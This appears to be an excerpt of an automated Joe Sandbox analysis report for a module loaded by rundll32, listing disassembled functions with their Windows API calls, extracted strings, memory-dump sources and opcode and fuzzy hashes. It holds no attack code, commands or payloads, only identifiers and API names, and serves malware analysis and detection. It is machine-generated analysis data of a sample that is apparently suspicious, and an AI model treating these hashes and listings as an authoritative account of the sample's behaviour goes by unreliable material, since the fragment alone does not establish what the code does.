                                                                    • API String ID: 634952362-2621746944
                                                                    • Opcode ID: 4decc1ef81a76709185ad96e1a7e39947b39d8f0209d5821278beaa937307f06
                                                                    • Instruction ID: a96765b41e69bee5f70cc77ad5942a759e78baf53b564563c82dc7501ae2db37
                                                                    • Opcode Fuzzy Hash: 4decc1ef81a76709185ad96e1a7e39947b39d8f0209d5821278beaa937307f06
                                                                    • Instruction Fuzzy Hash: 7681CD32B1AA42AAFB10EB61E8411EC3371FB457D8F802131DE2D57A95DF3D9219C358
                                                                    Function 00007FF8A8CFEA34 Relevance: 10.6, APIs: 7, Instructions: 124libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoadResource$ErrorFindFreeLastSizeof
                                                                    • String ID:
                                                                    • API String ID: 1885110938-0
                                                                    • Opcode ID: 5aa32985baf624cca8e7ff9a0fdc72fa29bc6c7aff20572481ecca569b5f52a8
                                                                    • Instruction ID: d10f816a6a5706b13ddd9ea391857e19630a1fef90ccb16b281166ae3a0a036a
                                                                    • Opcode Fuzzy Hash: 5aa32985baf624cca8e7ff9a0fdc72fa29bc6c7aff20572481ecca569b5f52a8
                                                                    • Instruction Fuzzy Hash: 01417731B0EB42A2FB50AB19A44026A73D1FF85BD0F144235DA5E47BA4EF7CE8558B18
                                                                    Function 00007FF8A8D19E64 Relevance: 10.2, Strings: 8, Instructions: 198COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: after$before$fifth$first$fourth$last$second$third
                                                                    • API String ID: 1323251999-549961694
                                                                    • Opcode ID: 51c0320c9ecd296dbe28aa3bbaaf7859e52e22885190c7b5b4c29b4abe3a7bf4
                                                                    • Instruction ID: 8dd7128a6fdc85f06331599dbd398b3f067d2ff6f5f821c1fadc34f33efbc416
                                                                    • Opcode Fuzzy Hash: 51c0320c9ecd296dbe28aa3bbaaf7859e52e22885190c7b5b4c29b4abe3a7bf4
                                                                    • Instruction Fuzzy Hash: 5A812F32A26622A4FB00FBB5EC514EC2374FF557C8F802535EA1E67AA5DF399508C358
                                                                    Function 00007FF8A8CFEDE0 Relevance: 9.3, APIs: 6, Instructions: 341stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00007FF8A8CFFEFA,?,?,00000000,?,00007FF8A8CFF9FF,?,00000000), ref: 00007FF8A8CFEF32
                                                                      • Part of subcall function 00007FF8A8D96700: EnterCriticalSection.KERNEL32 ref: 00007FF8A8D96710
                                                                    • _Init_thread_footer.LIBCMT ref: 00007FF8A8CFEF01
                                                                      • Part of subcall function 00007FF8A8D966A0: EnterCriticalSection.KERNEL32 ref: 00007FF8A8D966B0
                                                                      • Part of subcall function 00007FF8A8D966A0: LeaveCriticalSection.KERNEL32 ref: 00007FF8A8D966F0
                                                                      • Part of subcall function 00007FF8A8CFE0A4: _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8CFE0C0
                                                                      • Part of subcall function 00007FF8A8CFE0A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8CFE13B
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$ExceptionInit_thread_footerLeaveThrow_invalid_parameter_noinfolstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 2723823283-0
                                                                    • Opcode ID: b6d218e01d93139bd259be634565b875a9de92124726b052b61462cf44f5c266
                                                                    • Instruction ID: 1b896eaff69a4dd66b83f5f0cf94e246cb251ec7d404070c302f73db3b39a0f6
                                                                    • Opcode Fuzzy Hash: b6d218e01d93139bd259be634565b875a9de92124726b052b61462cf44f5c266
                                                                    • Instruction Fuzzy Hash: 37E1A032A2EB82A5F7A09B15E4403B96361FF847D0F404135DA9D87B94DFBCE845CB28
                                                                    Function 00007FF8A8D07680 Relevance: 9.3, APIs: 6, Instructions: 277fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSize$AttributesDeallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 2266459488-0
                                                                    • Opcode ID: 44d6dd8011be339173400ccdf1f0c6f5fe9cb07d33a31f72547726f31f158f42
                                                                    • Instruction ID: 1fda2e45a8e42df052416b616a0e11273f99dea7dc41f1c029f577e3cfc2c59c
                                                                    • Opcode Fuzzy Hash: 44d6dd8011be339173400ccdf1f0c6f5fe9cb07d33a31f72547726f31f158f42
                                                                    • Instruction Fuzzy Hash: 2CB11332A1AA41A6E710EF25E8905EE3371FB813C4F402035EA6E57E95DF3DE549C714
                                                                    Function 00007FF8A8DD01A4 Relevance: 9.2, APIs: 6, Instructions: 245COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1405656091-0
                                                                    • Opcode ID: 318a314b98ae4d8ed2d993a8be0cd42bcacbb9af60853c6932bb243a02edfb9a
                                                                    • Instruction ID: 4e9413367c869cc8394dd0ce88129a9aaca0203f6adf9d8a330e7c37c3c3a460
                                                                    • Opcode Fuzzy Hash: 318a314b98ae4d8ed2d993a8be0cd42bcacbb9af60853c6932bb243a02edfb9a
                                                                    • Instruction Fuzzy Hash: CE91F6B2F072469BEB588F25C9413B96791EB847C8F049035DA1D8B78AEF3CE8548B54
                                                                    Function 00007FF8A8DCCFD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 7a8e782dcfe3c76f70ce5210072e5310648d50e5df58fb2ab3501447c95856a4
                                                                    • Instruction ID: 002aad42bedd9c4c4a91c09052ab53bbd93330a47dc0e6a1689d2f1833b94a95
                                                                    • Opcode Fuzzy Hash: 7a8e782dcfe3c76f70ce5210072e5310648d50e5df58fb2ab3501447c95856a4
                                                                    • Instruction Fuzzy Hash: 61319132609F8196DB20DF29E8402AE33A0FB887D8F500135EA9D43B98EF3CD159CB14
                                                                    Function 00007FF8A8D56E84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D5ABD0: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D56EB3), ref: 00007FF8A8D5AC8B
                                                                      • Part of subcall function 00007FF8A8D5ABD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D56EB3), ref: 00007FF8A8D5ACCF
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00007FF8A8D56EFA
                                                                    • RegQueryValueExW.ADVAPI32 ref: 00007FF8A8D56F26
                                                                    • RegCloseKey.ADVAPI32 ref: 00007FF8A8D56F31
                                                                      • Part of subcall function 00007FF8A8D57010: FindResourceExW.KERNEL32 ref: 00007FF8A8D570A9
                                                                      • Part of subcall function 00007FF8A8DC903C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DC9059
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$FindOpenResource_invalid_parameter_noinfo
                                                                    • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 3908126574-1787575317
                                                                    • Opcode ID: f90eb44e6d66334d976b3e22866244f6b311c03ab069681db9b47509216f6885
                                                                    • Instruction ID: 2444915068196c373d3d40b5bba38584a205a77da589d087b033cbe64dff89e1
                                                                    • Opcode Fuzzy Hash: f90eb44e6d66334d976b3e22866244f6b311c03ab069681db9b47509216f6885
                                                                    • Instruction Fuzzy Hash: F231D532B1AB42E1EB109B24F45576A6360FF857E0F401532EAAD037A5DF3DD109CB18
                                                                    Function 00007FF8A8D0BA28 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D027FC: std::runtime_error::runtime_error.LIBCPMT ref: 00007FF8A8D028D6
                                                                      • Part of subcall function 00007FF8A8D027FC: throw_exception.LIBCPMT ref: 00007FF8A8D028DF
                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8A8D0BAA5
                                                                      • Part of subcall function 00007FF8A8D009E0: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D00A12
                                                                      • Part of subcall function 00007FF8A8D12F58: enable_error_info.LIBCPMT ref: 00007FF8A8D12F72
                                                                      • Part of subcall function 00007FF8A8D12F58: _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D12F91
                                                                      • Part of subcall function 00007FF8A8D10AAC: throw_exception.LIBCPMT ref: 00007FF8A8D10AC7
                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8A8D0BBC8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::invalid_argument::invalid_argumentthrow_exception$ExceptionThrow__std_exception_copyenable_error_infostd::runtime_error::runtime_error
                                                                    • String ID: Cannot convert dates prior to Jan 1, 1970$could not convert calendar time to local time
                                                                    • API String ID: 3961748639-1097574331
                                                                    • Opcode ID: 04861b4c69b6c7a141ae0b26592c8f8106bb269fb2dbc542c92ba1a5e59addfc
                                                                    • Instruction ID: 5b7ee5ba94e2dd8479ca986eb9a5f99ceb417abd34e99e7f3a872af06e037ec6
                                                                    • Opcode Fuzzy Hash: 04861b4c69b6c7a141ae0b26592c8f8106bb269fb2dbc542c92ba1a5e59addfc
                                                                    • Instruction Fuzzy Hash: 27614562F0565656EF14ABA6D8515FC2332EB847C4F404036EE1E2BBDADF3CE5068314
                                                                    Function 00007FF8A8DB8990 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF8A8DB8A13
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 389471666-631824599
                                                                    • Opcode ID: 611536a1a0a5444bbb5d3a74b3bedf1facef6155a213c0476897455c6dfbf728
                                                                    • Instruction ID: e23b3b981fbd1de51246048066a44fea422b74153c6ba55975b8034677079b51
                                                                    • Opcode Fuzzy Hash: 611536a1a0a5444bbb5d3a74b3bedf1facef6155a213c0476897455c6dfbf728
                                                                    • Instruction Fuzzy Hash: 9C116D32A15B42B7F7049B26D94437932A4FF04795F004035CA4D82A51EF3CE5B8C728
                                                                    Function 00007FF8A8D0B560 Relevance: 6.2, APIs: 4, Instructions: 233COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalErrorInitializeLastSection
                                                                    • String ID:
                                                                    • API String ID: 3413597225-0
                                                                    • Opcode ID: 4db546f3b79c203cb01530d438a4291011299e12985f3e21473a40ed8998f796
                                                                    • Instruction ID: f64631a877d4962fc64fe76e12fec528301c6428dbdd0e3919704f046790787d
                                                                    • Opcode Fuzzy Hash: 4db546f3b79c203cb01530d438a4291011299e12985f3e21473a40ed8998f796
                                                                    • Instruction Fuzzy Hash: E991A276606B46A1EB15CF25E88436937A4FB45BD4F048236CE5E83390DF3CE558C324
                                                                    Function 00007FF8A8DCD670 Relevance: 5.5, APIs: 3, Instructions: 1031COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1286766494-0
                                                                    • Opcode ID: cf43d3430d882ff370bae3f5266935d1471dd2a82202f84d00506a7c015d913e
                                                                    • Instruction ID: 62c361169c2d6182b6d0ba9048e411fd7c8893597b01ad577bde82940deeab07
                                                                    • Opcode Fuzzy Hash: cf43d3430d882ff370bae3f5266935d1471dd2a82202f84d00506a7c015d913e
                                                                    • Instruction Fuzzy Hash: 249221B2A0A69296E7209F35D85017E3BA1FB45BC8F044135DB9D43B94DF3CE928C728
                                                                    Function 000001CEAFC79500 Relevance: 5.4, Strings: 4, Instructions: 380COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ $ $(
                                                                    • API String ID: 0-3698178323
                                                                    • Opcode ID: 5c31586f011da146f7a0e2f3f26b49a2f6bf0a272a270216fad1032cc7f56bac
                                                                    • Instruction ID: 9f9f5114620ef2250bcea62867a6ca986e0fc93ac86a1dc7e52e7f8d06e00bb4
                                                                    • Opcode Fuzzy Hash: 5c31586f011da146f7a0e2f3f26b49a2f6bf0a272a270216fad1032cc7f56bac
                                                                    • Instruction Fuzzy Hash: 37D14B706187888FE7A5DF29D849BAEB7E5FB98340F40492DD48EC3291DF34D8458B86
                                                                    Function 00007FF8A8D09C5C Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
